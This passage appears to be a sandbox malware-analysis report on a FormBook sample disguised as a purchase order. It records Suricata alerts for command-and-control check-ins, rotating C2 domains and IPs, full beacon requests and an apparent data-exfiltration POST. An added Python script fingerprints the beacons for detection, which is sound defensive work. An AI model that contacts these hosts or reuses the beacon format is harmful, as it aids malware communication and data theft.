Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_0321C390 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\at.exe | Code function: 3_2_0321C4C6 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\at.exe | Code function: 4x nop then xor eax, eax | 3_2_03209AF0
Source: C:\Windows\SysWOW64\at.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_037D04E8

            Networking

            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 34.150.58.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 34.150.58.73:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49769 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49769 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 91.215.85.23:80
            Source: DNS query: www.syvra.xyz
Source: Joe Sandbox View | IP Address: 91.215.85.23
Source: Joe Sandbox View | IP Address: 162.0.213.94
Source: Joe Sandbox View | IP Address: 162.241.226.190
Source: Joe Sandbox View | ASN Name: PINDC-ASRU
Source: Joe Sandbox View | ASN Name: ACPCA
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 occurrences)
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile
            Source: global traffic | HTTP traffic detected: GET /65ev/?_vft=vxWlbDi8ipa49jzp&6X=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.route4.org | Connection: close | User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global traffic | HTTP traffic detected: GET /x7sd/?6X=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI=&_vft=vxWlbDi8ipa49jzp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.subitoadomicilio.shop | Connection: close | User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global traffic | HTTP traffic detected: GET /h2bb/?6X=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&_vft=vxWlbDi8ipa49jzp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.syvra.xyz | Connection: close | User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global traffic | HTTP traffic detected: GET /edpl/?6X=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&_vft=vxWlbDi8ipa49jzp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.hm62t.top | Connection: close | User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global traffic | HTTP traffic detected: GET /6m23/?6X=xNP+YF7kN8YyHFbGfhCbM4vPtrObLTBpZTX0aom8zYno+17KeimnOIL9nX5Ojh8oMyFsBplL+bbJn9Xx4KkSTeDh/PbqhhexF1uqyGHiSdrf0qV82I/xPx8=&_vft=vxWlbDi8ipa49jzp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.zhuoyueapp.top | Connection: close | User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global traffic | HTTP traffic detected: GET /7d10/?6X=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&_vft=vxWlbDi8ipa49jzp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.autonashville.com | Connection: close | User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global traffic | HTTP traffic detected: GET /m409/?6X=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&_vft=vxWlbDi8ipa49jzp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.dom-2.online | Connection: close | User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global traffic | HTTP traffic detected: GET /21tc/?6X=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&_vft=vxWlbDi8ipa49jzp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.easyanalytics.site | Connection: close | User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global traffic | HTTP traffic detected: GET /1i25/?6X=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&_vft=vxWlbDi8ipa49jzp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Host: www.kalomor.top | Connection: close | User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global traffic | DNS traffic detected: DNS query: www.teksales.space
            Source: global traffic | DNS traffic detected: DNS query: www.linkbasic.net
            Source: global traffic | DNS traffic detected: DNS query: www.route4.org
            Source: global traffic | DNS traffic detected: DNS query: www.meery.store
            Source: global traffic | DNS traffic detected: DNS query: www.subitoadomicilio.shop
            Source: global traffic | DNS traffic detected: DNS query: www.syvra.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.hm62t.top
            Source: global traffic | DNS traffic detected: DNS query: www.zhuoyueapp.top
            Source: global traffic | DNS traffic detected: DNS query: www.pelus-pijama-pro.shop
            Source: global traffic | DNS traffic detected: DNS query: www.autonashville.com
            Source: global traffic | DNS traffic detected: DNS query: www.torkstallningar.shop
            Source: global traffic | DNS traffic detected: DNS query: www.dom-2.online
            Source: global traffic | DNS traffic detected: DNS query: www.easyanalytics.site
            Source: global traffic | DNS traffic detected: DNS query: www.kalomor.top
            Source: global traffic | DNS traffic detected: DNS query: www.loan-insurance.shop
            Source: unknown | HTTP traffic detected: POST /x7sd/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate | Host: www.subitoadomicilio.shop | Origin: http://www.subitoadomicilio.shop | Content-Length: 199 | Content-Type: application/x-www-form-urlencoded | Cache-Control: no-cache | Connection: close | Referer: http://www.subitoadomicilio.shop/x7sd/ | User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 | Data Raw: (hex dump omitted here; it is the byte-for-byte encoding of the Data Ascii value) | Data Ascii: 6X=8zK/CYulK3elMZg/XDtmJKc66fDfSiiBrefNTgI5IbbaKbiQfvZSij6kA6FY3Bk0W4Tv2lOk8mdDB0LTz2eOh/HjKNiV62lRGDrofCE/eNPYhFYfGfkCCCGPF7LEk5oCH3CNy76ZpOd4OU/99sJE5Fyt1DbmzsoEylJsVvXPMlSHs7dd2aY15pHT1XgXhr+EVw==
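The GET requests and the single POST listed above share one User-Agent, one `_vft` token value, one data-carrying query key (`6X`) and a four-character directory, while the Host header rotates through unrelated domains; the POST goes only to www.subitoadomicilio.shop, the one host that was also queried with GET. The script below is an added example and not part of the Joe Sandbox report: it reduces captured requests to that fingerprint and flags a cluster when the same fingerprint spans several domains, then lists POSTs to a host already in a cluster. The sample list embeds a subset of the report's own requests (6X payloads shortened) plus two benign requests constructed here for contrast; the `min_hosts` threshold and the benign hosts are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# The single User-Agent that every request in the report carries (copied from the report).
FORMBOOK_UA = ("SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 "
               "Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0")

# (method, host, request-target, user-agent). Rows 1-6 are taken from the report above,
# with the long 6X values shortened; rows 7-8 are benign requests constructed for contrast.
SAMPLE_REQUESTS = [
    ("GET",  "www.route4.org",           "/65ev/?_vft=vxWlbDi8ipa49jzp&6X=dwwIBvsgoPduu1x0", FORMBOOK_UA),
    ("GET",  "www.subitoadomicilio.shop", "/x7sd/?6X=xxifBtz+TGalALhNcy&_vft=vxWlbDi8ipa49jzp", FORMBOOK_UA),
    ("GET",  "www.syvra.xyz",             "/h2bb/?6X=qJKXiU3Y6HiR5EQ+73&_vft=vxWlbDi8ipa49jzp", FORMBOOK_UA),
    ("GET",  "www.hm62t.top",             "/edpl/?6X=q/xbqOJEbFxqZdP5Pq&_vft=vxWlbDi8ipa49jzp", FORMBOOK_UA),
    ("GET",  "www.zhuoyueapp.top",        "/6m23/?6X=xNP+YF7kN8YyHFbGfh&_vft=vxWlbDi8ipa49jzp", FORMBOOK_UA),
    ("POST", "www.subitoadomicilio.shop", "/x7sd/", FORMBOOK_UA),
    ("GET",  "www.example.com",           "/index.html?lang=en", "Mozilla/5.0 (constructed benign UA)"),
    ("GET",  "cdn.example.net",           "/assets/app.js?v=42", "Mozilla/5.0 (constructed benign UA)"),
]

# Every beacon path in the report is a four-character directory: /65ev/, /x7sd/, /h2bb/, ...
SHORT_DIR = re.compile(r"^/[a-z0-9]{4}/$")


def parse_request(method, host, target, user_agent):
    """Reduce one request to the fields the fingerprint is built from."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    return {
        "method": method,
        "host": host,
        "path": parts.path,
        "short_dir": SHORT_DIR.match(parts.path) is not None,
        "query_keys": tuple(sorted(query)),        # ('6X', '_vft') for every beacon in the report
        "token": query.get("_vft", [None])[0],     # one fixed value across all hosts in the report
        "user_agent": user_agent,
    }


def find_beacon_clusters(requests, min_hosts=3):
    """Group GET requests by (User-Agent, query-key set, _vft token) and keep the groups
    that spread one fingerprint over at least `min_hosts` distinct domains, each with a
    short random-looking directory. Returns {fingerprint: sorted list of hosts}."""
    groups = defaultdict(set)
    for req in (parse_request(*r) for r in requests):
        if req["method"] != "GET" or not req["short_dir"] or req["token"] is None:
            continue
        groups[(req["user_agent"], req["query_keys"], req["token"])].add(req["host"])
    return {key: sorted(hosts) for key, hosts in groups.items() if len(hosts) >= min_hosts}


def exfil_candidates(requests, clusters):
    """POSTs to a host and short directory already seen in a beacon cluster. In the report
    only www.subitoadomicilio.shop receives a POST after its GET; the other domains are
    contacted with a single GET each."""
    flagged = {host for hosts in clusters.values() for host in hosts}
    return [(req["host"], req["path"])
            for req in (parse_request(*r) for r in requests)
            if req["method"] == "POST" and req["short_dir"] and req["host"] in flagged]


if __name__ == "__main__":
    clusters = find_beacon_clusters(SAMPLE_REQUESTS)
    for (ua, keys, token), hosts in clusters.items():
        print(f"beacon fingerprint: query keys={keys} token={token}")
        print(f"  User-Agent: {ua}")
        for host in hosts:
            print(f"  {host}")
    print("POST to a clustered host:", exfil_candidates(SAMPLE_REQUESTS, clusters))
```

Keying on the token and query-key set rather than on the domains is what makes this survive the domain rotation: the hosts change from run to run, the fingerprint does not. A 404 from a clustered host is not evidence that the host is benign; in the report every contacted domain answered 404 and the sample still POSTed a 199-byte form body to one of them.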
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sun, 22 Sep 2024 15:39:57 GMT | Content-Type: text/html | Content-Length: 58288 | Connection: close | Vary: Accept-Encoding | ETag: "6691ebc2-e3b0" | Data Raw (hex dump truncated in the report; decoded prefix): <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style> * { margin: 0; padding: 0; box-sizing: border-box; } html { height: 100%; } body { height: 100%; font-size: 14px; } .container { display: flex; flex-direction: column; align-items: center; height: 100%; padding-top: 12%; } .logo img { display: block; width: 100px; } .logo img + img { margin-top: 12px; } .title { margin-top: 24px; font-size: 110px; color: #333; letter-spacing: 10px; } .desc { font-size: 16px; color: #777; text-align: center; line-height: 24px; } .footer { /* position: absolute; left: 0; bottom: 32px; width: 100%; */ margin-top: 24px; text-align: center; font-siz[...]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Sun, 22 Sep 2024 15:40:21 GMT (identical responses also at 15:40:24, 15:40:26 and 15:40:29 GMT) | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 424 | Connection: close | Data Raw: (hex dump omitted here; it is the byte-for-byte encoding of the Data Ascii value) | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 22 Sep 2024 15:40:35 GMT (identical responses also at 15:40:37, 15:40:40 and 15:40:42 GMT; the last one carries Content-Type: text/html; charset=utf-8) | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 16052 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Raw (hex dump truncated in the report; decoded prefix): <!DOCTYPE html><html lang="en" ><head><meta charset="UTF-8"><title>404 Not Found</title><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body><!-- partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id=[...]
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sun, 22 Sep 2024 15:40:49 GMT (identical responses also at 15:40:51, 15:40:54 and 15:40:57 GMT) | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a8e223-94" | Data Raw: (hex dump omitted here; it is the byte-for-byte encoding of the Data Ascii value) | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:41:04 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Strict-Transport-Security: max-age=3153600000; includeSubDomainsX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:41:06 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Strict-Transport-Security: max-age=3153600000; includeSubDomainsX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:41:11 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Strict-Transport-Security: max-age=3153600000; includeSubDomainsX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 